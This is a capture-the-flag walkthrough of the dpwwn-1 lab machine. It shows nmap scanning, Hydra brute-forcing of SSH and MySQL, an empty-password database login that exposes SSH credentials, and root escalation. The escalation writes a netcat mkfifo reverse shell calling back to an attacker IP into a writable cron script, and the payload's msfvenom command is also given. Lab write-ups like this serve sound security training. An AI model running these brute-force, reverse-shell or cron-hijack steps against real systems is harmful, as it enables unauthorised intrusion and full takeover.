dpwwn-1-WALKTHROUGH

1. Host discovery

Using netdiscover, the target host was found at 192.168.203.145.

2. Port scanning

Using Nmap:

root@kali:~# nmap -sS -A 192.168.203.145 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 08:49 CST
Nmap scan report for 192.168.203.145
Host is up (0.00051s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:openbsd:openssh:7.4: 
|     	CVE-2018-15919	5.0	https://vulners.com/cve/CVE-2018-15919
|_    	CVE-2017-15906	5.0	https://vulners.com/cve/CVE-2017-15906
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /info.php: Possible information file
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| vulners: 
|   cpe:/a:apache:http_server:2.4.6: 
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
|     	CVE-2014-0226	6.8	https://vulners.com/cve/CVE-2014-0226
|     	CVE-2017-9788	6.4	https://vulners.com/cve/CVE-2017-9788
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2018-17199	5.0	https://vulners.com/cve/CVE-2018-17199
|     	CVE-2017-9798	5.0	https://vulners.com/cve/CVE-2017-9798
|     	CVE-2017-15710	5.0	https://vulners.com/cve/CVE-2017-15710
|     	CVE-2016-8743	5.0	https://vulners.com/cve/CVE-2016-8743
|     	CVE-2016-2161	5.0	https://vulners.com/cve/CVE-2016-2161
|     	CVE-2016-0736	5.0	https://vulners.com/cve/CVE-2016-0736
|     	CVE-2014-3523	5.0	https://vulners.com/cve/CVE-2014-3523
|     	CVE-2014-0231	5.0	https://vulners.com/cve/CVE-2014-0231
|     	CVE-2014-0098	5.0	https://vulners.com/cve/CVE-2014-0098
|     	CVE-2013-6438	5.0	https://vulners.com/cve/CVE-2013-6438
|     	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
|     	CVE-2016-4975	4.3	https://vulners.com/cve/CVE-2016-4975
|     	CVE-2015-3185	4.3	https://vulners.com/cve/CVE-2015-3185
|     	CVE-2014-8109	4.3	https://vulners.com/cve/CVE-2014-8109
|     	CVE-2014-0118	4.3	https://vulners.com/cve/CVE-2014-0118
|     	CVE-2014-0117	4.3	https://vulners.com/cve/CVE-2014-0117
|     	CVE-2013-4352	4.3	https://vulners.com/cve/CVE-2013-4352
|     	CVE-2018-1283	3.5	https://vulners.com/cve/CVE-2018-1283
|_    	CVE-2016-8612	3.3	https://vulners.com/cve/CVE-2016-8612
3306/tcp open  mysql   MySQL 5.5.60-MariaDB
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   MySQL 5.5.60-MariaDB: 
|_    	NODEJS:602	0.0	https://vulners.com/nodejs/NODEJS:602
MAC Address: 00:0C:29:79:43:8D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 192.168.203.145

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.70 seconds

The target machine has ports 22, 80 and 3306 open.

3. Finding vulnerabilities

The Nmap scan revealed an info.php, so we first visit the web service.

It is a website test page.

Viewing info.php:

Next, scan the directories with dirb:

Nothing new was found either, so that only leaves brute-forcing SSH and MySQL.

Hydra is used for the brute-force attempts:

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.203.145
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.203.145

After brute-forcing for a long time without success, it turned out that MySQL accepts a login with an empty password!

We log in directly with mysql -h 192.168.203.145 -u root -p:

After some searching, an SSH username and password were found in the ssh database:

MariaDB [ssh]> select * from users;
+----+----------+---------------------+
| id | username | password            |
+----+----------+---------------------+
|  1 | mistic   | testP@$$swordmistic |
+----+----------+---------------------+

4. Privilege escalation

Connect over SSH with the command: ssh -p22 mistic@192.168.203.145.

Login succeeded!

Now we need root privileges to read the flag in the /root directory.

Running sudo -l shows that this user is not allowed to execute commands via sudo:

Use find / -type f -perm -u=s 2>/dev/null to look for SUID programs.

This turned up crontab (scheduled tasks). Perhaps we can use it for privilege escalation.

View the scheduled tasks: cat /etc/crontab

Sure enough, there is a script that runs as root, and the current user mistic can write to it!

We use the command:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.203.129 7777 >/tmp/f" > logrot.sh

to write the reverse-shell code into logrot.sh.

On the difference between > and >>: the former overwrites the file's contents, the latter appends to it.

When I did DC-7 earlier I didn't know where this command came from; now I know: it is generated by msf, as follows:

msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.203.129 LPORT=7777 R

Back to the point: after writing the command, start a listener with nc -lvp 7777, and after a short wait we get a root shell.

The flag was read successfully.

 
